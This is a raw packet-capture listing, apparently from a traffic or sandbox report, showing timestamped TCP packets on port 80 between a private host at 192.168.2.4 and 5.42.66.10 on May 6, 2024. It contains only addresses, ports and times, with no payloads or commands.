May 6, 2024 07:53:04.769210100 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769222021 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.769222021 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769233942 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769239902 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.769246101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769258022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769258976 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.769270897 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769288063 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769303083 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.769303083 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.769305944 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769319057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769325972 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.769330025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769340992 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769352913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769354105 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.769365072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769371033 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.769376040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769387007 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769395113 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.769398928 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769409895 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769421101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769423962 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.769433975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769444942 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769447088 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.769455910 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.769468069 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769479990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769484997 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.769494057 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769505978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769510031 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.769535065 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.769556999 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.769658089 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769670010 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769681931 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769694090 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769701958 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.769707918 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769720078 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.769720078 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769735098 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769746065 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.769747972 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769758940 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769763947 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.769771099 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769782066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769790888 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.769793034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769804955 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769815922 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769817114 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.769829035 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769831896 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.769840002 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769850969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769856930 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.769862890 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769875050 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769884109 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.769887924 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769900084 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769901037 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.769912004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769922018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769929886 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.769933939 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769944906 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769954920 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.769957066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769964933 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.769968033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769979954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.769989014 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.769990921 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770001888 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770009041 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.770015001 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770025969 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770031929 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.770037889 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770050049 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770059109 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.770061016 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770070076 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.770087004 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770087957 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.770098925 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770108938 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770117044 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.770122051 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770132065 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770134926 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.770143032 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770154953 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770160913 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.770168066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770180941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770180941 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.770190954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770193100 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.770203114 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770215034 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770221949 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.770226955 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770237923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770246983 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.770250082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770260096 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.770262957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770275116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770275116 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.770287991 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770298958 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770303011 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.770312071 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770322084 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770330906 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.770334005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770339012 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.770345926 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770359039 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770368099 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.770370960 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770382881 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770394087 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.770395041 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770406008 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770411015 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.770417929 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770428896 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770431995 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.770440102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770448923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770457029 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.770461082 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770473003 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770483017 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770484924 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.770495892 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770503044 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.770520926 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.770544052 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.770863056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770874977 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.770905972 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.771070957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.771107912 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.771209955 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.771250963 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.771429062 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.771464109 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.771619081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.771657944 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.771759033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.771800041 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.771959066 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.771970987 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.771981955 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.771994114 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.771996975 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.772005081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.772013903 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.772018909 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.772023916 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.772032022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.772042990 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.772054911 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.772057056 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.772068024 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.772068977 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.772093058 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.772121906 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.772145033 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.772156954 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.772170067 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.772181034 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.772192955 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.772214890 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.772337914 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.772350073 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.772361040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.772375107 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.772389889 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.772411108 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.772474051 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.772485018 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.772495985 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.772507906 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.772514105 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.772525072 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.772526026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.772526026 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.772536993 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.772547007 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.772548914 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.772572041 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.772586107 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.772608042 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.772644997 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.772747040 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.772759914 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.772785902 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.772798061 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.772933006 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.772943974 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.772954941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.772967100 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.772970915 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.772978067 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.772989035 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.772990942 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773003101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773006916 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.773030043 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.773046970 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.773063898 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773077011 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773087025 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773099899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773103952 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.773112059 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773117065 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.773123980 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773135900 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773139954 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.773148060 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773159027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773169041 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.773169994 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773183107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773195982 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773197889 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.773207903 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773215055 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.773238897 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.773262978 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.773379087 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773390055 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773401022 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773412943 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773418903 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.773425102 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773437023 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773446083 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.773472071 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.773518085 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773530006 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773540974 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773554087 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773555040 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.773565054 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773576975 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773580074 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.773587942 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773597956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773605108 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.773624897 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.773642063 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.773684978 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773696899 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773706913 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773724079 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.773735046 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.773752928 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.773838043 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773849964 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773860931 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773873091 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773876905 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.773884058 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773895025 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.773900986 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773911953 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773911953 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.773924112 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773935080 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773936033 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.773946047 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773952007 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.773957968 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773971081 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773979902 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.773983002 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.773994923 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774002075 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.774004936 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774015903 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.774027109 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774039030 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774045944 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.774049997 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774060965 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774070024 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.774072886 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774085999 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774090052 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.774112940 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.774139881 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.774153948 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774199009 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.774338007 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774349928 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774359941 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774372101 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774374962 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.774383068 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774391890 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.774394989 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774404049 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.774405956 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774418116 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774430037 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774435997 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.774441957 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774456024 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.774473906 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.774482012 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774497032 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.774516106 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.774688005 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774701118 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774724007 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.774734020 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.774846077 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774857998 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774868965 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774878979 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774883032 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.774889946 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774900913 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.774903059 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774914026 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774919033 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.774926901 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774938107 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774941921 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.774950027 CEST	80	49741	5.42.66.10	192.168.2.4
May 6, 2024 07:53:04.774962902 CEST	49741	80	192.168.2.4	5.42.66.10
May 6, 2024 07:53:04.774967909 CEST	80	49741	5.42.66.10	192.168.2.4
